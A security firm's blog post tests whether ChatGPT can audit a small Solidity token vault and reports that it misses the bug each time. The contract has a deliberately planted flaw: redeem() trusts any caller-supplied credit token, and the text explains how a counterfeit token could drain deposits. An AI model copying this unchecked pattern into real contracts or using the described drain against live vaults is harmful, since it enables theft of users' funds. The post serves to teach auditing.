Skip to main content
Luna Tong

Can ChatGPT Audit Smart Contracts?

ChatGPT fails to find simple, but critical smart contract bugs
Article heading

The answer is No.

GPT-4 is certainly amazing, and we’ve seen notable tweets [1] [2] demonstrating examples of ChatGPT identifying smart contract vulnerabilities.

The thing is–and speaking as the author of one of the Tweets linked above–that these examples are cherry-picked. Even OpenAI’s latest model, GPT-4, is unable to reliably detect surface-level critical bugs.

Let’s begin with a simple example contract that has a deadly vulnerability lurking within it.

Example Contract

pragma solidity 0.8.15;

import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import {ERC20CreditToken} from "./ERC20CreditToken.sol";

/// Tokenizing Vault Contract
///
/// This is a simple vault contract that accepts ERC20 deposits and issues
/// credit (accounting) tokens. The accounting tokens can then be redeemed
/// to withdraw a deposit.
contract TokenizingVault {

/// ERC20 accounting tokens (unique per underlying)
mapping(ERC20 => ERC20CreditToken) public creditTokens;

/// ERC20CreditToken reference implementation
ERC20CreditToken public immutable creditTokenImpl;

constructor() {
creditTokenImpl = new ERC20CreditToken();
}

function create(ERC20 underlying, uint256 amount)
external nonReentrant returns (ERC20CreditToken, uint256)
{
ERC20CreditToken creditToken = creditTokens[underlying];

// Revert if no token exists, must call deploy first
if (creditToken == ERC20CreditToken(address(0x00)))
revert('Token Does Not Exist');

// Transfer in underlying
underlying.transferFrom(msg.sender, address(this), amount);

// Mint new credit tokens
creditToken.mint(msg.sender, amount);

return (creditToken, amount);
}

function redeem(ERC20CreditToken token, uint256 amount)
external nonReentrant
{
token.burn(msg.sender, amount);
token.underlying().transfer(msg.sender, amount);
}

function deploy(ERC20 underlying)
external nonReentrant returns (ERC20CreditToken)
{
// Create credit token if one doesn't already exist
ERC20CreditToken creditToken = creditTokens[underlying];
if (creditToken == ERC20CreditToken(address(0))) {
bytes memory tokenData = abi.encodePacked(underlying, address(this));
creditToken = ERC20CreditToken(address(creditTokenImpl).clone(tokenData));
creditTokens[underlying] = creditToken;
}
return creditToken;
}
}

This is a simple vault contract. It accepts user deposits of arbitrary ERC20s and gives matching “credit” (i.e., deposit) tokens. These deposit tokens can then be redeemed for the original deposit. Deposit tokens are handy because it allows users to fungibly trade their deposits. You could imagine this vault might support other features like yield farming, but this example is cut to an absolute minimum to make it as simple as possible to audit.

Can you spot the bug?

That’s right, it’s in the redeem function. This is an external function with no access control and no input validation. Let’s see why this function is vulnerable.

While it is true that a user would not be able to withdraw money if they lack insufficient credit tokens (token_.burn would revert), this is not sufficient. The core issue lies in the fact that the function doesn’t validate the passed token_ is authentic; i.e., issued by the vault contract and not counterfeit. You could exploit this contract by calling redeem() with a fake, attacker-generated ERC20CreditToken whose underlying() is a real, valuable ERC20 that other users have deposited into the vault.

To give an analogy, imagine that this vault is the U.S. Federal Reserve. In this banking system, people can deposit wire transfers to receive dollars. The corresponding exploit would be if the Federal Reserve allowed you to withdraw money using fake dollars that you forged.

Keep in mind this function is only two lines long, and it is a straightforward lack of input validation. It is not a deep, complex, or confusing logical bug or design flaw. It is a basic coding mistake.

Can GPT find a simple input validation bug?

Now, let’s try to use ChatGPT to audit this smart contract. It is very small, so it fits into GPT-4’s enormous context window.

We’ll use this prompt:

Helpful as always, ChatGPT responds with “Ready”. Now let’s just paste in the contract source code. (Note: when I did this experiment I had some extra comments in the code, in theory, the “audit” results ought to be the same.)

Here’s ChatGPT’s response:

Not only does ChatGPT misses the critical bug, it does so confidently. Ironically, it even points out missing input validation, though the bug it specifically claims to have found doesn’t really matter.

Okay. Maybe we just got unlucky. Let’s try running it again.

Funnily enough, it mentions the redeem function, but it unfortunately hallucinated a bug that again, doesn’t really matter. It missed the much more serious issue that could drain the entire vault, despite lasering in on the right function.

Okay. What if we try to pass in the code, one function at a time? And this time, we will even prompt it specifically to treat attacker-controlled inputs as potentially malicious.

Helpful as always. Now let’s just paste in the code one function at a time.

This goes on for a while, asking for more code each time. On a different run, it analyzed the functions one at a time, basically summarizing the function and pointing out some facts about the function.

This was the final output:

So once again, it missed the critical, but relatively surface-level bug. This should be sufficient to show that ChatGPT is certainly not up to the task of auditing smart contracts, especially for mission-critical, financial code.

Conclusion

With the advent of GPT-4, ChatGPT is an excellent assistant for many tasks. It is proficient at writing code snippets, answering general knowledge questions, and providing helpful advice and commentary. That being said, ChatGPT is prone to generate responses that “feel” right (i.e., pass a vibe check), but aren’t really correct. Worryingly, despite OpenAI’s best efforts it is still often confidently wrong.

We conducted a short series experiments with a relatively surface-level, but critical, smart contract vulnerability in a small contract. ChatGPT failed to identify the vulnerability in all trials. This experiment was certainly limited by a low sample size (ChatGPT currently only allows 50 generations per 3 hours). However, for mission-critical code like smart contracts, a false negative rate of 10 in 10 tries is unacceptable.

ChatGPT and LLM-based AI technology in general will likely become a useful aid in a security researcher’s arsenal of tools. However, it is unlikely for LLMs, in their current state, to make the job redundant. It seems that highly-skilled, specialized jobs, like smart contract auditing, are likely to remain in demand for at least the forseeable near-term future.

About Us

Zellic specializes in securing emerging technologies. Our security researchers have uncovered vulnerabilities in the most valuable targets, from Fortune 500s to DeFi giants.

Developers, founders, and investors trust our security assessments to ship quickly, confidently, and without critical vulnerabilities. With our background in real-world offensive security research, we find what others miss.

Contact us for an audit that’s better than the rest. Real audits, not rubber stamps.